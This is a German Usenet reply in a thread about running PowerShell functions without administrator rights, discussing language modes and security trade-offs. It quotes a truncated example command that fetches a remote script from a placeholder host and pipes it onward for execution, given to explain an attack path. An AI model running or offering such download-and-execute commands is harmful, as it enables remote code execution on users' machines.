Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]
Groups > de.comp.os.ms-windows.misc > #234855
| From | christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) |
|---|---|
| Newsgroups | de.comp.os.ms-windows.misc |
| Subject | Re: Powershell function ohne Admin-Rechte |
| Date | 2026-01-19 11:41 +0200 |
| Organization | MB-NET.NET for Open-News-Network e.V. |
| Message-ID | <HHAn1kvIVaB@point04.soemtron.de> (permalink) |
| References | <HGAcmfIYVaB@point04.soemtron.de> <HGvkYaw2VaB@point04.soemtron.de> <msu780F2hujU1@mid.individual.net> |
Christoph Schneegans <christoph@schneegans.de> schrieb: > Ein Angreifer muss keine Datei ablegen. Es genügt, durch eine > Sicherheitslücke in Browser oder E-Mail-Programm oder wie auch > immer den kurzen Befehl > > powershell.exe -Command "irm 'https://example.org/temp/test.ps1'| ... Danke für die Erklärung. Das ist natürlich unschön. Da sollte es doch einfacher (für MS) sein, diese Art Scriptausführung generell zu unterbinden. Geht das irgendwie? Bei mir gibt es diesen Anwendungsfall definitiv nicht. Der erzwungene Umweg über lokale Speicherung ist doch ein einfaches und effektives Sicherheitsfeature. > und dieses Skript kann im > FullLanguage-Sprachmodus viel mehr und viel leichter Unfug treiben > als im ConstrainedLanguage-Sprachmodus. Trotzdem denke ich, wer den Aufwand des Suchens und Ausnutzens solcher Sicherheitslücken betreibt, hat null Probleme, den in Funktionen verpackten Code ohne das Gerüst auszuführen. Konsequenterweise sollte man vielleicht PS generell verbieten. Aber wahrscheinlich hat MS dafür gesorgt, daß dann auch Grundfunktionalität leidet. > Ich mache das im Idealfall einmal pro Monat, und die beiden > PowerShell-Sitzungen - eine mit Administrator-Rechten, eine ohne, > aber beide im FullLanguage-Sprachmodus - bleiben offen, solange > Windows läuft. BTW: Da war doch IIRC mal was, daß es "einfach" möglich sein soll, gleichzeitig mit erhöhten Rechten laufende Prozesse zur Erweiterung der eigenen Rechte zu nutzen. Ist das eigentlich definitiv ausgeschlossen? cu, Christian PGP Key available.
Back to de.comp.os.ms-windows.misc | Previous | Next — Previous in thread | Next in thread | Find similar
Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-03 20:56 +0200
Re: Powershell function ohne Admin-Rechte Werner Tann <wtann@gmx.at> - 2026-01-04 08:25 +0100
Re: Powershell function ohne Admin-Rechte Werner Tann <wtann@gmx.at> - 2026-01-04 11:54 +0100
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-04 13:21 +0200
Re: Powershell function ohne Admin-Rechte Arno Welzel <usenet@arnowelzel.de> - 2026-01-08 14:06 +0100
Re: Powershell function ohne Admin-Rechte Joerg Gerlach <jger@gmx.de> - 2026-01-05 19:29 +0100
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-06 11:16 +0200
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-13 09:32 +0200
Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-14 17:49 +0100
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-15 21:53 +0200
Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-16 08:21 +0100
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-19 11:41 +0200
Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-23 23:28 +0100
csiph-web